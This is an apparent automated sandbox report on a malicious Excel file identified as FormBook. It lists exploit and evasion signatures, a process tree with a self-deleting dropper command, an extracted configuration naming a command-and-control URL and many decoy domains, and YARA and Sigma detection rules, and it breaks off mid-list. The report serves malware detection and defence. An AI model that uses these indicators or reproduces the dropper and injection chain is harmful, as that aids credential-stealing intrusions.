Play interactive tour

Edit tour

Windows Analysis Report OCT 13 2021 - PRINT COPY.xlsx

Overview

General Information

Sample Name:	OCT 13 2021 - PRINT COPY.xlsx
Analysis ID:	502343
MD5:	5c546d999e38e6e51a6c1675b3a646f3
SHA1:	39ce280bc35b7cc313cbaed2476ee300d7e928c3
SHA256:	980e889b97c92e9a81ff548a481978ad5c2b42829ddb6014d3720c19772e3799
Tags:	FormbookVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Performs DNS queries to domains with low reputation

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1912 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2676 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2628 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)

vbc.exe (PID: 1988 cmdline: C:\Users\Public\vbc.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

cmd.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 1412 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6aa9:$sqlite3step: 68 34 1C 7B E1 0x6bbc:$sqlite3step: 68 34 1C 7B E1 0x6ad8:$sqlite3text: 68 38 2A 90 C5 0x6bfd:$sqlite3text: 68 38 2A 90 C5 0x6aeb:$sqlite3blob: 68 53 D8 7F 8C 0x6c13:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x238e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2391a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x260c38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x260fc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x244eb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x26ccd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2449a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x26c7c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x244fb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x26cdd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x24512f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x26cf4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x239bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2619da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x243c1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x26ba3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x23a932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x262752:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x24a387:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2721a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x24b42a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2472b9:$sqlite3step: 68 34 1C 7B E1 0x2473cc:$sqlite3step: 68 34 1C 7B E1 0x26f0d9:$sqlite3step: 68 34 1C 7B E1 0x26f1ec:$sqlite3step: 68 34 1C 7B E1 0x2472e8:$sqlite3text: 68 38 2A 90 C5 0x24740d:$sqlite3text: 68 38 2A 90 C5 0x26f108:$sqlite3text: 68 38 2A 90 C5 0x26f22d:$sqlite3text: 68 38 2A 90 C5 0x2472fb:$sqlite3blob: 68 53 D8 7F 8C 0x247423:$sqlite3blob: 68 53 D8 7F 8C 0x26f11b:$sqlite3blob: 68 53 D8 7F 8C 0x26f243:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6aa9:$sqlite3step: 68 34 1C 7B E1 0x6bbc:$sqlite3step: 68 34 1C 7B E1 0x6ad8:$sqlite3text: 68 38 2A 90 C5 0x6bfd:$sqlite3text: 68 38 2A 90 C5 0x6aeb:$sqlite3blob: 68 53 D8 7F 8C 0x6c13:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2628	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ca9:$sqlite3step: 68 34 1C 7B E1 0x15dbc:$sqlite3step: 68 34 1C 7B E1 0x15cd8:$sqlite3text: 68 38 2A 90 C5 0x15dfd:$sqlite3text: 68 38 2A 90 C5 0x15ceb:$sqlite3blob: 68 53 D8 7F 8C 0x15e13:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.3354b60.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.vbc.exe.3354b60.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xcd2b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcd642:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf50d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf5462:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd9355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x101175:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xd8e41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x100c61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xd9457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x101277:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xd95cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1013ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xce05a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf5e7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd80bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xffedc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xcedd2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf6bf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xde827:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x106647:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xdf8ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.3354b60.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xdb759:$sqlite3step: 68 34 1C 7B E1 0xdb86c:$sqlite3step: 68 34 1C 7B E1 0x103579:$sqlite3step: 68 34 1C 7B E1 0x10368c:$sqlite3step: 68 34 1C 7B E1 0xdb788:$sqlite3text: 68 38 2A 90 C5 0xdb8ad:$sqlite3text: 68 38 2A 90 C5 0x1035a8:$sqlite3text: 68 38 2A 90 C5 0x1036cd:$sqlite3text: 68 38 2A 90 C5 0xdb79b:$sqlite3blob: 68 53 D8 7F 8C 0xdb8c3:$sqlite3blob: 68 53 D8 7F 8C 0x1035bb:$sqlite3blob: 68 53 D8 7F 8C 0x1036e3:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.330a940.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.vbc.exe.330a940.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1174d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x117862:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13f2f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13f682:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x123575:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14b395:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x123061:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14ae81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x123677:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b497:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1237ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x14b60f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11827a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14009a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1222dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x14a0fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x118ff2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x140e12:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x128a47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x150867:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x129aea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.330a940.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x125979:$sqlite3step: 68 34 1C 7B E1 0x125a8c:$sqlite3step: 68 34 1C 7B E1 0x14d799:$sqlite3step: 68 34 1C 7B E1 0x14d8ac:$sqlite3step: 68 34 1C 7B E1 0x1259a8:$sqlite3text: 68 38 2A 90 C5 0x125acd:$sqlite3text: 68 38 2A 90 C5 0x14d7c8:$sqlite3text: 68 38 2A 90 C5 0x14d8ed:$sqlite3text: 68 38 2A 90 C5 0x1259bb:$sqlite3blob: 68 53 D8 7F 8C 0x125ae3:$sqlite3blob: 68 53 D8 7F 8C 0x14d7db:$sqlite3blob: 68 53 D8 7F 8C 0x14d903:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.21ee5b8.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Sigma Overview

Exploits:

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2628

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", 